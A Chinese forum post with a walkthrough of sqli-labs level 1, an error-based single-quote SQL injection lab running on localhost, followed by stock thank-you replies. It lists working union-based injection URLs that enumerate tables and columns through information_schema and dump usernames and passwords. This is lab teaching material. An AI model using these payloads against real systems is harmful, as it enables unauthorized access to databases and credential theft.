小U技术分享论坛

快捷导航
查看: 1898|回复: 101

[电子书] sqli-labs-master第一关:基于错误的GET单引号字符型注入

[复制链接]

该用户从未签到

发表于 2018-6-8 23:44:10 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

立即注册 已有账号?点击登录

x
窗外风雪再大
也有我陪伴着你
VJBRGibxiM3MIB9X.jpg sqli-labs-master第一关:基于错误的GET单引号字符型注入


首先来到第一关:
http://127.0.0.1/sqli-labs-master/Less-1/


sL0xM1Ld17F1MzIZ.jpg 用语句 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' 进行测试报错,可以看到sql语句出错了。
c7A62Xw0FL6vLbVZ.jpg 用 and 1 = 1去测试:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 1 %23 回显正常。


%23是“#”注释


O3P3FUBbPbf036UP.jpg

用 and 1 = 2 去测试:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 2 %23 回显示失败,说明存在注入点。
j55C391ZnPu9P4vA.jpg

判断字段:
当order by 3 的时候,回显正常:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 %23


R5lW35453cW4654r.jpg

当order by 4 的时候,回显不正常:
iQxdqTyErSlX13Ex.jpg

说明字段是3。
报错显示回显库:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,2,3 %23
回显的地方是2和3。


U3iSGF4gYMJia65A.jpg 用version()看版本:
用database()看当前网站使用的数据库:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,version(), database() %23
通过下图可以看到,使用的php版本是5.5.53,该网站使用的数据库名字是security


SrRR5N6fJZrJ5M2W.jpg 添加?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23 使用过滤查询语句where 查看security数据库内的表。


http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23


看到有四个表:


bA3OxSGo8g9d9d36.jpg 查看users表内的列
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23




LxCO6Yvw8F638H38.jpg 查看username和password里的内容:
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users %23


WF1q1OiqqFggw1fd.jpg 我们在看到users表里还看到了id,我们看看有多少组账号密码
只需要在后面加上 where id = n即可
经过测试 id 最大是14
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 1%23


y98Rv1n1YjmLmAOX.jpg http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 14%23


o6FFCD726R7hrt6R.jpg 第一关结束:


第二关很快更新。




声明:官方源码被我改动了。附上我改动的php代码:


o60q6GWd6xw0ZVDs.jpg


上一篇:《网络安全法》时代,如何安全“挖漏洞”?
下一篇:安全牛渗透kali linux合集(全套)
回复

使用道具 举报

该用户从未签到

发表于 2018-7-1 14:24:03 | 显示全部楼层
楼主太厉害了!楼主,I*老*虎*U!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-1 20:12:07 | 显示全部楼层
楼主发贴辛苦了,谢谢楼主分享!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-1 23:12:17 | 显示全部楼层
论坛东西就是多这个帖子不回对不起自己!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-2 03:25:26 | 显示全部楼层
楼主,大恩不言谢了!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-2 12:36:52 | 显示全部楼层
楼主发贴辛苦了,谢谢楼主分享!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-3 02:30:05 | 显示全部楼层
楼主发贴辛苦了,谢谢楼主分享!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-3 06:47:00 | 显示全部楼层
楼主太厉害了!楼主,I*老*虎*U!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-3 07:43:26 | 显示全部楼层
楼主太厉害了!楼主,I*老*虎*U!
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2018-7-3 11:58:25 | 显示全部楼层
论坛东西就是多这个帖子不回对不起自己!
回复 支持 反对

使用道具 举报

 懒得打字,点击右侧快捷回复   下面自定义回复
高级模式
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站长QQ
35656948 周六至周日:09:00 - 21:00
电子邮箱:35656948@qq.com

小U分享论坛是一个致力于学习与分享IT技术(QQ排名、QQ群排名技术、渗透测试、渗透测试技术、渗透技术…)的论坛。由众多的IT技术爱好者共同维护,尽力为IT技术初学者打造一个良好的学习环境。

Powered by Discuz! X3.2

QQ|手机版|小黑屋|QQ群排名、渗透测试 ( 粤ICP备18051481号

GMT+8, 2018-10-19 03:17 , Processed in 0.289997 second(s), 64 queries , Gzip On.

快速回复 返回顶部 返回列表